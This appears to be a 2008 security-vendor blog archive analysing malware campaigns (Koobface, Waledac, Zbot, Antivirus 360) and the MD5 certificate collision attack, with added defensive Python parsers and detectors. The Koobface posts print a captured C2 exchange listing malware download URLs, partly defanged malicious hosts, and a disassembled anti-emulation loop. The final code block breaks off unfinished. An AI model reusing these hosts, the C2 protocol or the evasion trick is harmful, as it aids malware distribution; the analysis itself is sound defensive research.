Wednesday, December 31, 2008

Broken Trust


Yesterday's presentation at the Chaos Communication Congress by a handful of researchers brought to light that the use of MD5 for secure computing (digital certificates, SSL, etc.) truly is gasping its last breath. A fine summary of the MD5 algorithm and its use by the Certificate Authorities is written up by Scott Merrill here.
Unfortunately, Mr. Merrill makes the same lame excuse for the CAs that most of the software world has made for decades regarding change: "MD5 has been known for some time to be weak against collision attacks, but running a CA is a pretty complex operation, so the entities behind them are slow to change." Pretty complex? When something is broken, profitable security enterprises have the resources to change it (the researchers themselves state that the "affected CAs are switching to SHA-1"). That excuse simply is not valid.

Is this security vulnerability something that we didn't already know about? Heck, a free MD5 crack demo is posted here and a fantastic study and MD5 collision attack source is served here.
The new work is a blow to the internet infrastructure that we depend on for secure communications. For CAs, trust is their business, and some have not been very good at deserving it. The group's work is impactful in that it brings this specific application of MD5 cracks to public light. It takes a determined and seriously talented group like this to implement optimized algorithms for this specific application and handle it properly. Let's hope that their work "stimulates better Internet security with adequate protocols".

Finally, Thomas Ptacek at Matasano made several excellent points about the work. The sky is not falling. Continue about your business on the internet with the same caution.
"If you take everything in the paper at face value, a couple things mitigate this attack:
* The research team had access not only to a cluster of PS3s but to a specially optimized MD5 collision-finding implementation, which they had because Lenstra's team has been playing with a PS3 cluster for a while.
* The research team had access to a currently-unpublished optimization to (presumably the birthday-bits search part of) the collision-finding algorithm,
* The attack could be made impractical by randomizing the serial numbers for all future certs issued by RapidSSL (and, presumably, by banning MD5)."


Update: In a guest opinion posted on the 0day blog, Chris Eng similarly laments that the problem never should have happened.

For those of you interested in the characters/researchers behind the work, Alexander Sotirov recently shared conceptual details and motivations behind it:
"Most of the theory behind our attack was published in the 'Target Collisions for MD5 and Colliding X.509 Certificates for Different Identities' paper in 2007 by Marc Stevens, Benne de Weger and Arjen Lenstra" and that "David Molnar and Jake Appelbaum noticed that RapidSSL was still using MD5 in 2008".
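A check that goes with the "switching to SHA-1" point above, written for this post rather than taken from the researchers, Mr. Merrill or any CA: given a DER-encoded certificate, read the outer signatureAlgorithm OID and flag the MD5 (and MD2) PKCS#1 schemes. The certificate it runs on below is a constructed skeleton with a dummy tbsCertificate, not a real certificate; on a real system you would normally just read the "Signature Algorithm" line from openssl x509 -noout -text, and this walker is for the case where only a DER blob and Python are at hand.

```python
"""Report which signature algorithm a DER-encoded X.509 certificate carries.

Added example for this post, not code from the researchers or any CA. It walks
only the outer Certificate SEQUENCE (tbsCertificate, signatureAlgorithm,
signatureValue) with a minimal DER reader; the sample certificate built below
is a constructed skeleton, not a real certificate.
"""

# RSA signature-scheme OIDs from the PKCS#1 arc
SIG_OIDS = {
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
}
WEAK_OIDS = {"1.2.840.113549.1.1.2", "1.2.840.113549.1.1.4"}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:                       # long form: next n bytes hold the length
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(body):
    """Decode OID contents: first byte packs the first two arcs, then base-128."""
    arcs = [body[0] // 40, body[0] % 40]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                   # high bit clear ends the arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(cert_der):
    """Return (oid, name) of the certificate's outer signatureAlgorithm."""
    tag, cert, _ = _read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _tbs, pos = _read_tlv(cert, 0)      # tbsCertificate: skipped
    tag, alg, _ = _read_tlv(cert, pos)     # AlgorithmIdentifier SEQUENCE
    tag, oid_body, _ = _read_tlv(alg, 0)
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    oid = _decode_oid(oid_body)
    return oid, SIG_OIDS.get(oid, "unknown")


def signed_with_md5_family(cert_der):
    """True when the certificate was signed with md2WithRSA or md5WithRSA."""
    return signature_algorithm(cert_der)[0] in WEAK_OIDS


# --- constructed sample certificate skeleton -------------------------------

def _tlv(tag, body):
    """DER-encode one tag-length-value."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _encode_oid(dotted):
    """Encode a dotted OID into its DER contents bytes."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))
    return bytes(out)


def make_sample_cert(sig_oid):
    """Skeleton Certificate: dummy tbsCertificate, real AlgorithmIdentifier,
    dummy signature BIT STRING. Constructed for this example only."""
    tbs = _tlv(0x30, _tlv(0x02, b"\x01"))
    alg = _tlv(0x30, _tlv(0x06, _encode_oid(sig_oid)) + b"\x05\x00")
    sig = _tlv(0x03, b"\x00" * 9)
    return _tlv(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.5"):
        der = make_sample_cert(oid)
        print(signature_algorithm(der), "weak:", signed_with_md5_family(der))
```

The walker deliberately ignores the inner tbsCertificate.signature field; the outer AlgorithmIdentifier is what the CA actually signed with, and the two must match in a well-formed certificate anyway.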

Tuesday, December 30, 2008

Season's Greetings with a postcard.exe

In a throwback to the Storm campaigns that we heavily reported on in 2007, another group has been spamming out links to malicious Season's Greetings sites (a list of domains previously serving up "ecard.exe" variants can be found here), attempting to fool users into running "postcard.exe". Here is a screenshot of one server currently up this afternoon on an infected host on the Comcast network at 71.233.193.xx:



A visit to this page results in multiple client-side exploits, delivered by multiple redirected web pages, which ThreatFire prevents. ThreatFire also stops the attacking executable file as Trojan.Waledac.

The attackers make it obvious what web site they are attempting to mimic in their social engineering scheme. The entire HTML header for the attacking web page on the malicious site was ripped directly from 123greetings.com, a popular ecard site. Here is some of the header from the malicious web page:
Title: New Year Cards, Free New Year eCards, Greeting Cards
meta name="keywords" content="new year cards,free new year ecards,greeting cards,greetings,wishes for the new year,free e cards for new year,christmas and new year wishes,free new year greetings,free ecards for new year"
meta name="description" content="2009 is here! Fill your heart with new hopes, reach out for new opportunities and celebrate the New Year! Reach out to your friends, family,..."

Keep in mind that the legitimate www.123greetings.com site appears to send out ecards as Flash videos, and not as "postcard.exe" files.

Update (1/5/2008): Waledac variant card.exe continues to be distributed -- we're seeing hxxp://direct christmas gift.com as an offending server up and running with the same card store front.

Thursday, December 18, 2008

Zbot Mailings on the Increase

Zbot is the kind of malware you really don't want to see on anyone's computer, stealing banking passwords and financial information.

We've been seeing more reports and ThreatFire preventions of the malware delivered along with a somewhat common email-based social engineering scheme. The Zbot variant is attached to an official-sounding warning from the worldwide delivery group UPS. The file currently in circulation has a name somewhat like "Exl6512721.ZIP", and the contents of the email look something like this text:

"Sorry, we were not able to deliver postal package you sent on November the 25th in time because the recipient's address is not correct.
Please print out the invoice copy attached and collect the package at our office.
If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS Support Team "

The Zbot variant attempts to steal banking information and passwords from unsuspecting users, and this one sends the information off to a waiting server in Russia. Fortunately, at this time, the servers are down.
You can see here that ThreatExpert now decodes the config files delivered with this nastiness. The post includes a list of financial institutions commonly being targeted.

As always, exercise caution when opening unusual emails and especially when opening attachments.

Friday, December 12, 2008

Antivirus 360 Distribution - Update Third Party Plugins

Antivirus 360 is the new Antivirus 2009 indeed. It is spreading using the same old commodity plugin exploit techniques as AV 2009. Be sure to update any QuickTime Player or Adobe Plugins that you may be running to the latest versions.



A number of web sites are delivering a variety of exploits to get this rogueware on your system. One method of delivery that seems to be very reliable is via a set of malformed PDF files. The malware files exploit various versions of the Adobe PDF reader, delivering download-and-execute shellcode that calls URLDownloadToFileA on hxxp://svc .ms / xrun.tmp and WinExec on that download.



This file is a custom packed downloader. After a long delay, it contacts multiple web sites, then pulls down a number of files, including another awful Vundo package that was at the top of hit lists for years.
The first popup from the downloaded adware on the system was redirected to the Antivirus 360 Web Scanner, which is nothing more than cheap JavaScript pretending to scan one's hard drive and fraudulently claiming that malware is littering the system. On another system, we saw VirusRemover2008 being hawked by the redirected popup, with lots of fraudulent detections and shocking warnings.

So please, keep this stuff off of your system. Update all third party plugins on your system.

Thursday, December 11, 2008

AV360 is the New Antivirus 2009

Antivirus 360 is the newest Rogueware in high prevalence, while VirusTotal AV detection results are extremely low, currently at 3/36. Our ThreatFire community is seeing and preventing far too many hits on this stuff today. It shamelessly re-uses the same AV2009 detection names, like "Spyware.IEMonster", and presents a similar 37 phony malware detections on a system. Avoid this Rogueware site. The distributors shamelessly rip names like PC Magazine Editor's Choice to fabricate credibility:


You may end up with a file like "av360install_770522156496.exe" on your system, which drops av360.exe, among others.
At the very least, if you see this dialog (consistently full of bad English grammar, as in the poorly written Antivirus 2009 dialogs), kill it:



Steer clear of this stuff. Here are a few new windows, presenting the same phony malware detections as AV2009 on a clean lab system:



It looks like this one altogether will take the place of Antivirus 2009 -- all of the sites that usually serve that Rogueware package are down.

It presents a large phony privacy violation alert early on:


A few phony statements that they might throw onto your screen once running are listed here, in a variety of languages:
Threats detected
Privacy violation alert!
Antivirus 360 has detected numerous privacy violations. Some programs may send your private data to an untrusted internet host. Click here to permanently block this activity and remove the possible threat (Recommended)
System files modification alert!
Internal conflict alert!
Antivirus 360 has detected internal software conflict. Some application endeavors to access...
Spyware activity alert!
Spyware.IEMonster is a popular spyware that attempts to steal passwords from Web browsers...
Privacy Violation alert!
Antivirus 360 detected a Privacy Violation. A program is secretly sending your private data to an...
Some critical system files of your computer were modified by malicious program. It may cause system instability and data loss. Click here to block unathorised modification by removing threats (Recommended).
Gefahr! Missbrauch des Datenschutzes!
Antivirus 360 hat Missbrauch des Datenschutzes
Irgendeines Programm sendet heimlich Ihren privaten Daten in die ungesicherte Zone (empfehlt).
Gefahr!
Spyware Aktivitaten! Spyware.IEMonster Aktivitaten wurden festgestellt.
Prevention de la modification des fichiers de systeme!
Prevention de lactivite du Logiciel espion!
Internet Explorer, Mozilla Firefox, Outlook et dautres programmes, y compris des logins et des mots de passe des operations bancaires en ligne, eBay, PayPal....

Tuesday, December 9, 2008

Koobface Notes -- flash_update.exe, bolivar29.exe, tinyproxy.exe

Earlier last week, we first posted our usual warning about the spike in Koobface threats that our ThreatFire users were being protected against on their systems. That post set off some interest in the worm again. The last spike in the worm coincided with Dancho Danchev's post in November, following the first report in July of high worm prevalence.

Because we keep getting requests for information, along with the repeated assumption that the redirection to a video download makes this Zlob, and because the worm's components are actively being redistributed in high prevalence, we'll spill another Dancho-sized mug of coffee over additional, current technical details.

But first, an interesting note for users is that the social engineering scheme used to persuade users into installing the worm does not match the Adobe Flash Player install that the malware distributors are trying to spoof.
On a visit to the real adobe.com site, the user can click on an image to update their flash player:



Internet Explorer users visiting the Flash Player install page can then hit "Agree", and they are provided with an ActiveX install. When Firefox and Chrome users visit the authentic Flash Player install site and click on "Agree", they are prompted to install a file by the name of "install_flash_player.exe". Neither of these names is used by the worm distributors. The worm is provided as "flash_update.exe".

Multiple Koobface files are currently of interest here: flash_update.exe, bolivar29.exe, fmark2.dat, multiple batch files that delete these executables, tt_1209658078.exe, 351631.dll and tinyproxy.exe. Keep in mind that the end goal is to spread the 351631.dll and tinyproxy.exe files, installing them as a BHO and a system service (in the lab, it was installed as the "Shell Hardware Detection (ShellHWDetection)" system service). Both of these components are nasty little bits of adware. When the BHO identifies that a user is using a specific search engine, like Google or Yahoo, they are redirected to other sites. Ads are popped as well.

These were the files installed via a flash_update.exe executable being distributed and run a few hours ago from an unfortunate infected server in Serbia sitting on a home cable internet connection.

Flash_update.exe is a small executable simply packed with UPX and encoded to obfuscate strings (HTTP download links, interesting cookie information, etc.):
Flash_update.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
UPX packed
It drops c:\windows\bolivar29.exe (an exact duplicate of itself) and calls CreateProcessA on that file to run it.
It writes a batch file to c: to delete itself, calls CreateProcessA on the batch file, and exits.

bolivar29.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
UPX packed
Bolivar29.exe is an exact duplicate of flash_update.exe. When started, it checks its own filename. If it is bolivar29.exe, the infection has already occurred, so it doesn't need to drop another copy of itself. It looks for ed323432006.dat on the c: drive and checks for social networking "cookies" and data files. It drops another file, tt_1228867129.exe, into the temp directory, which POSTs back to a web server:
_______________________________________
/fb/first.php HTTP/1.0
Host: 5824125537.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.4
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 81

f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0

HTTP/1.1 200 OK
Date: Wed, 10 Dec 2008 xx:xx:xx GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 148
Connection: close
Content-Type: text/html

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
START|http://www.teamtga.com/images/games/gif/6243.exe
FBTARGETPERPOST|20
#BLACKLABEL
_______________________________________

It pulls the files listed in the response down and installs them.
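To make the check-in above concrete, here is a small parser for both halves of the exchange, written for this post (it is not the worm's code and not ThreatFire's). The request body and the reply text are constructed from the capture shown above ("-xxx" is the post's own redaction); the check-in heuristic at the end is derived from this one capture only and is an assumption about what other samples send.

```python
"""Parse the Koobface check-in POST and the server's command list.

Added example for this post, not the worm's or ThreatFire's code. The two
strings below are constructed from the capture in the post.
"""
from urllib.parse import parse_qs

# POST body as captured (the post redacts the 'a' value as "-xxx")
BEACON_BODY = ("f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1"
               "&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0")

# Server reply lines as captured
COMMAND_REPLY = """\
START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
START|http://www.teamtga.com/images/games/gif/6243.exe
FBTARGETPERPOST|20
#BLACKLABEL
"""


def parse_beacon(body):
    """Split the POST body; report version, site and which c_* flags are set.
    The post ties the c_* flags to its cookie check; only the suffixes are
    reported here, with no guess at which network each one names."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    found = sorted(k[2:] for k, v in fields.items() if k.startswith("c_") and v == "1")
    return {"version": fields.get("v"), "site": fields.get("s"),
            "cookies_found": found, "fields": fields}


def parse_commands(text):
    """Reply lines are NAME|ARG; a line starting with '#' closes the list."""
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            commands.append(("END", line[1:]))
            break
        name, _, arg = line.partition("|")
        commands.append((name, arg))
    return commands


def download_urls(commands):
    """The START commands are the files the bot fetches and runs."""
    return [arg for name, arg in commands if name == "START"]


def is_koobface_checkin(method, path, body):
    """Heuristic (assumption from this single capture): a POST to .../first.php
    carrying the s/v/ck fields plus at least one c_* cookie flag."""
    if method != "POST" or not path.endswith("/first.php"):
        return False
    keys = set(parse_qs(body, keep_blank_values=True))
    return {"s", "v", "ck"} <= keys and any(k.startswith("c_") for k in keys)


if __name__ == "__main__":
    print(parse_beacon(BEACON_BODY))
    for url in download_urls(parse_commands(COMMAND_REPLY)):
        print("bot would fetch:", url)
```

Run against a proxy log, the useful output is the list of START URLs: those are the hosts (the compromised server in this capture) worth blocking or pulling samples from, while the beacon fields show what the bot reported about the victim's cookies.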

Tinyproxy.exe is the final install. When it is installed as a service and interacts with the BHO DLL, it proxies and redirects the infected system's browser to multiple ad sites. The file itself is copied with Hidden and System attributes, so on most systems the file is not displayed in a "c:\program files\tinyproxy" folder window.
Last week this file was hosted at the American International Baseball Club web server in Vienna (www.aibc.vienna.org), even though some reports stated it had been taken down. This latest infection shows that the files are served up at another compromised server. Here is a link to the BHO installer: www.team ga.c om/images/g ames/gif/ 6243.exe.

Last week, we saw our IE web browser redirected to ads from Yahoo! HotJobs, the March of Dimes Foundation, and constant redirections to www-find-www.com and 216.195.52.100.
This time, when we opened a browser to Yahoo!, searched on "Cha Ca Vietnam" and clicked on a result, our browser was redirected to "http://www-find-www.net/?q=cha%20ca"



When we opened a browser to Google on the infected system, searched on "Cha Ca Vietnam" and clicked on a result, a new window popped open to
http://morefindit.com/?q=cha%20ca
with a final redirection to
http://www.toseeka.com/search.php?q=Cha+Am



Ugh. This global mess continues on as a massive financially motivated browser hijacking scam.

Internet Explorer 7.0 0day

A suspected IE7 0day has surfaced on servers in China. Ryan Naraine posted information earlier this morning on the state of the patch and the exploit.

A couple of our ThreatFire users unfortunately visited the site, but fortunately they have been protected against multiple exploit attempts from that site. We are trying to trigger and analyze the 0day amongst the others, but it appears to be rather unreliable in exploiting a mshtml.dll vulnerability. The site attempts to attack multiple ActiveX control vulnerabilities, the ancient MS06-014 vuln, and several others. At the very least, the stash of trojans, rootkit components and password stealers delivered by it are prevented by ThreatFire.
Most of the malware appears to be gaming-password related, and the 0day exploit implemented in JavaScript attempts to identify the OS your system is running and attacks Windows XP or Windows 2003 accordingly.

Be sure to keep your Microsoft patches up to date; there should be more later today. A patch for the 0day flaw will follow.

Global Recession Hits Every Market?

A somewhat behind the scenes Crimeware-as-a-service scheme opened up shop a few weeks ago in time for the holidays, but to a lack of "customers".


Currently, the service is set up to host 30 customer sites, and since November, the group has taken on a measly seven. For this market, that is not much momentum. At 50 bucks a month for hosting, the group is taking on a petty 350 U.S. dollars for the service. The global recession seems to be hitting every market.

Monday, December 8, 2008

Koobface Anti-Emulation Time Lock Trick

Koobface contains a lot of interesting tricks, components, and schemes to write about. In the interest of keeping this post somewhat brief, we'll focus on an anti-emulation technique that may be keeping the AV detection rates low for repacked and redistributed Koobface executables, while at the same time providing vendors with a false or confused sense of effectiveness.

At worm runtime in the lab, we observed that one unpacked loop in particular was taking excessively long to execute prior to any identifiable malicious behavior from the worm, and this same loop is present in four of the five binaries that the Koobface flash_update component is dropping. So we took another look.

Within the common loop, GetTickCount() was called and bytes were moved and compared, but it seemed that no real decryption was occurring. Persistent data was not rewritten or modified. This sort of activity is suggestive of something called a time lock: "A common anti-emulation trick is to introduce loops that take a relatively long time to compute. The loop may in fact take so long to emulate that the antivirus scanner gives up."
However, what appears to be a Koobface time-lock implementation is very simple, much simpler than the ones formalized in the paper linked to above. But the concept is just as interesting in that it implements a variable-length lock duration at runtime. The amount of time spent spinning through the loop is in part dependent on how long the system has been running. And yet the technique's usage is uncommon in that there are not two timing calls and a hard-coded value to compare against to detect emulation. Instead, this unusual variability is due to its unique use of a single GetTickCount() call and a comparison to a counter value that is also being incremented.

Here is the loop that we were interested in, as viewed through a debugger:

00401712 |> /83C9 FF /or ecx, FFFFFFFF
00401715 |. |33C0 |xor eax, eax
00401717 |. |8D7C24 10 |lea edi, dword ptr ss:[esp+10]
0040171B |. |F2:AE |repne scas byte ptr es:[edi]
0040171D |. |F7D1 |not ecx
0040171F |. |49 |dec ecx
00401720 |. |3BF1 |cmp esi, ecx
00401722 |. |73 18 |jnb short DA3FE57A.0040173C
00401724 |. |8BC6 |mov eax, esi
00401726 |. |99 |cdq
00401727 |. |B9 05000000 |mov ecx, 5
0040172C |. |F7F9 |idiv ecx
0040172E |. |8A4C34 10 |mov cl, byte ptr ss:[esp+esi+10]
00401732 |. |B0 FB |mov al, 0FB
00401734 |. |2AC2 |sub al, dl
00401736 |. |02C8 |add cl, al
00401738 |. |884C34 10 |mov byte ptr ss:[esp+esi+10], cl
0040173C |> |46 |inc esi
0040173D |. |FFD3 |call near ebx ; kernel32.GetTickCount
0040173F |. |83C9 FF |or ecx, FFFFFFFF
00401742 |. |8BD0 |mov edx, eax
00401744 |. |33C0 |xor eax, eax
00401746 |. |8D7C24 10 |lea edi, dword ptr ss:[esp+10]
0040174A |. |F2:AE |repne scas byte ptr es:[edi]
0040174C |. |F7D1 |not ecx
0040174E |. |49 |dec ecx
0040174F |. |03D1 |add edx, ecx
00401751 |. |3BF2 |cmp esi, edx
00401753 |.^\72 BD \jb short DA3FE57A.00401712

When the first location is jumped into, esi is already set to "0".
It's a nice loop -- the last instruction takes you back to the first almost every time, but the loop is executed an unpredictable number of times. Almost all of the instructions within the loop are arbitrary in that they do not modify any data. For example, the "repne scas byte ptr es:[edi]" instruction simply reads through a hard-coded string, looking for the null byte at the end of the string. That same string is read again and again, almost like a strlen() that doesn't return a value:
    /* what the repne scas / not ecx / dec ecx sequence amounts to:
       walk to the terminating NUL and throw the count away */
    void strlen(const char *str) {
        const char *pstr = str;
        while (*pstr++)
            ;
    }
When GetTickCount is called, it returns the number of milliseconds that have elapsed since the system was started. Because this value differs on every system it is run on and changes every time it is called, the duration of the time lock will be unpredictable. When edx (our TickCount) is subtracted from esi by the cmp and esi is the smaller value, the CF flag is set to "1", the jb instruction sees the value as "below", and we jump back to the first instruction location. On every loop execution, both the esi and edx values are incremented and then compared. When esi catches up with edx, the loop is exited.

Therefore, the effect is that emulators may "give up" on this executable due to the loop, but the behavior is somewhat unpredictable. Sometimes, the lock duration will be short enough for an emulator to hang on and perform an erratic detection. This erratic detection may cause confusion for AV scanner vendors relying on emulation capabilities and create a false sense of effective detection.
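To see how the clock an emulator presents decides the outcome, here is a small Python model of the loop above. It is an added example written for this post, not the worm's code, and it follows the listing line by line (including the byte rewrite that the first half of the loop performs on the stack string while esi is still below its length). The tick source stands in for kernel32.GetTickCount, which is exactly the value an emulator has to invent.

```python
"""Model of the Koobface time-lock loop at 00401712..00401753.

Added example for this post, not the worm's code. `tick` stands in for
kernel32.GetTickCount so the same loop can be run under different clocks.
"""

MASK32 = 0xFFFFFFFF


def _strlen(buf):
    """repne scas / not ecx / dec ecx: number of bytes before the first NUL."""
    nul = buf.find(b"\0")
    return len(buf) if nul < 0 else nul


def timelock_step(buf, esi, tick):
    """One pass of the loop body over the stack string `buf` (a bytearray).
    Returns (new_esi, keep_looping); keep_looping is the jb at 00401753."""
    length = _strlen(buf)
    if esi < length:                                  # cmp esi,ecx ; jnb skips this
        delta = (0xFB - (esi % 5)) & 0xFF             # cdq/idiv by 5 ; mov al,0FB ; sub al,dl
        buf[esi] = (buf[esi] + delta) & 0xFF          # mov cl,[esp+esi+10] ; add cl,al ; store
    esi = (esi + 1) & MASK32                          # inc esi
    edx = (tick() + _strlen(buf)) & MASK32            # call GetTickCount ; add edx,ecx
    return esi, esi < edx                             # cmp esi,edx ; jb


def timelock_run(buf, tick, budget):
    """Run until the loop exits or `budget` iterations are spent.
    Returns (iterations, gave_up); gave_up is the 'emulator gives up' outcome."""
    esi, iterations = 0, 0
    while True:
        esi, again = timelock_step(buf, esi, tick)
        iterations += 1
        if not again:
            return iterations, False
        if iterations >= budget:
            return iterations, True


def frozen_clock(value):
    """Clock policy 1: GetTickCount always returns `value` (whatever the
    emulator seeded). The loop then runs exactly value + strlen(buf) times."""
    return lambda: value


def per_call_clock():
    """Clock policy 2: the tick advances by one on every GetTickCount call.
    esi and edx then grow in step, so the loop never exits on its own."""
    state = {"t": 0}

    def tick():
        t = state["t"]
        state["t"] = (t + 1) & MASK32
        return t

    return tick


if __name__ == "__main__":
    # constructed string; the real one is the hard-coded string at [esp+10]
    sample = bytearray(b"constructed sample string\0")
    print(timelock_run(sample, frozen_clock(3_600_000), 1 << 24))   # one hour of "uptime"
    print(timelock_run(bytearray(b"constructed sample string\0"), per_call_clock(), 100_000))
```

The two clock policies bracket the erratic behaviour described above: a frozen clock seeded near zero lets the loop finish in a handful of iterations, so the emulator reaches the payload and detects it, while a seed in the millions (or a clock that advances per call) exhausts any reasonable iteration budget first, and the same sample then looks clean.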

Finally, it is interesting that the "worm" components and droppers contain this same loop, as though it were a macro simply copied and pasted into the source for the various executables. The final and money making adware payload, "tinyproxy.exe", did not contain the loop. The adware/spyware component most likely was obtained from another party.

Dave's $30 Billion Smashter Prediction

Sometimes you get a crystal ball prediction and gimmickry. Sometimes you get something with real insight. Dave Aitel's real insight on DailyDave this morning focused on a NY Times article about the U.S. federal government's National Security Presidential Directive 54/Homeland Security Presidential Directive 23 that Bush signed in January 2008:
"Faster, smashter. When I see 30 billion dollars, I can tell you what you're going to get, as a taxpayer, for your money: Patch management, IDS, Anti-Virus, scanners of all shapes and sizes. Audits. Big rooms full of large screens correlating information that has absolutely no relevance to security. You can't correlate what you can't see. You can't patch what you don't know about.
Mr. Markoff is trying to tell us that the defenders are losing the battle. But if they are, it's because they *chose* to. Hackers use 0day and always have. The defenders are off making millions selling things that don't work against 0day.
I guess what I'm trying to say here is that at this point the attackers are just "reasonably competent". When it comes to offensive information security, we ain't seen nothing yet."

NPR, the Washington Post, and the NYT have all been spending more time reporting on computer security. It was very interesting to hear a guest on Boston NPR's hour-long "On Point" this morning discussing characteristics of Secretary of Defense Robert Gates' laptop and other PC-based resources at the U.S. Department of Defense, as well as the legal arm-twisting used to silence individuals who have participated in security breach investigations. And therein lies the real problem. All the discussion in the world about network security is useless when talk about real issues is silenced, and the individuals who need to protect their organization's data do not understand or cannot describe what they need to protect it from.

Friday, December 5, 2008

Koobface flash_update.exe Around the World

We are analyzing the binaries and Koobface processes and will provide detailed technical information later -- this one performs lots of process, system admin, and file create/delete activity, and each one carries a tricky anti-emulation trick that we'll describe here. Also of note, the server that was allegedly compromised to serve up Koobface-downloaded adware/clickfraud executables in early November continues to serve up malware:
hxxp:// www.aibcvienna.o rg/ youtube/fb.28.exe
The unfortunate piece is that this binary continues to see only 15/38 AV scan detections at virustotal.

In the meantime, here is a map of only some of the attacking servers hosting the Koobface worm since the very end of November. As you can see, there are some concentrated pockets of the worm's distribution servers throughout Europe, but it is a global problem:



Wednesday, December 3, 2008

Koobface on the Loose as "flash_update.exe"



"Koobface". Like "Facebook", only sort of backwards. Clever.

Social networking worms like the Koobface family are a reality, and their prevalence shows in our ThreatFire community. Users of Facebook need to be aware that links appearing on friends' Facebook pages may be links to malware downloads. Now, there is no need to stop clicking on links or visiting friends' pages. But just because a link is on a friend's page does not mean that the content at that link can be unconditionally trusted.

Basically, if you click on a link at a friend's profile, and your browser is redirected to a video page, do not download and run the executable when prompted. The consistent and malicious "flash_update.exe" is being prevented in high prevalence on a daily basis in our community. The little trick here is a twist on the need to update Adobe's Flash Player. But if you need to update your Flash Player, just go to Adobe's site and update it there. Here's an example from a Koobface distribution site already taken down:



Running the "flash_update.exe" download results in all sorts of problems for the user, including potential modifications to their own Facebook profile, prompting for captcha breaks, and others. The immediate result is an error message, "Error installing Flash Update. Please contact support".


In the infections we're observing this morning, an executable resembling the name "bolivar28.exe" is dropped to the system drive and run.


Update: the dropped executables, named "bolivar26.exe, bolivar28.exe" and so on, are copies of the original flash_update.exe files. A quick analysis shows them to be similar in functionality to the captcha crack scheming binaries previously observed in the wild. Also interesting is that these files are worming through and attacking other social networking sites like myspace.com, blackplanet.com, friendster.com, and bebo.com, in addition to its namesake.

Tuesday, December 2, 2008

Who Gave These Guys a Cert?


Xxx41.exe is a filename commonly associated with a trojan-downloader family that we've seen prevented all over the community for the past couple of weeks. It sometimes is dropped and run by phony video codecs with names like "moviecodec.278.exe", "k-codec.232.exe", etc. Xxx41.exe downloads fakealert executable components from sites like image-big-library.com and top100image.com using GET requests that evade weak firewall filters, looking like image file requests "/images/item_edjf.gif" and "/infoweek/footernav/new0808/ethrexpo.gif", which are then renamed to ~tmpc.exe (and similar names) and run on the system.
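The GET-request trick above, a Windows executable fetched under a .gif name, is easy to catch on the content side rather than the URL side. The following check is an added example for this post (not ThreatFire code): it flags any download whose URL path claims an image but whose body starts with a PE header. The two paths are the ones quoted above; the host names and payload bytes are constructed so that it runs offline.

```python
"""Flag an executable fetched under an image-file name.

Added example for this post, not ThreatFire code. The sample payloads and the
example.invalid host are constructed; only the two URL paths come from the post.
"""
import struct

IMAGE_EXTS = (".gif", ".jpg", ".jpeg", ".png", ".bmp")


def looks_like_pe(data):
    """MZ header at offset 0 plus a PE\\0\\0 signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def looks_like_gif(data):
    """A real GIF announces itself with one of the two GIF signatures."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def masquerading_executable(url, data):
    """True when the URL path claims an image but the body is a PE file."""
    path = url.split("?", 1)[0].lower()
    return path.endswith(IMAGE_EXTS) and looks_like_pe(data)


def fake_pe():
    """Constructed minimal PE-shaped blob: MZ at 0, e_lfanew -> 0x40, PE\\0\\0 there."""
    blob = bytearray(0x80)
    blob[:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x40)
    blob[0x40:0x44] = b"PE\0\0"
    return bytes(blob)


def fake_gif():
    """Constructed stand-in for a harmless image body."""
    return b"GIF89a" + bytes(26)


# Constructed "downloads": the paths are the two quoted in the post, the host
# is a placeholder, and the bodies are the stand-ins built above.
SAMPLE_DOWNLOADS = [
    ("http://example.invalid/images/item_edjf.gif", fake_pe()),
    ("http://example.invalid/infoweek/footernav/new0808/ethrexpo.gif", fake_gif()),
]


def flag_downloads(downloads):
    """Return the URLs whose bodies are executables hiding behind image names."""
    return [url for url, body in downloads if masquerading_executable(url, body)]


if __name__ == "__main__":
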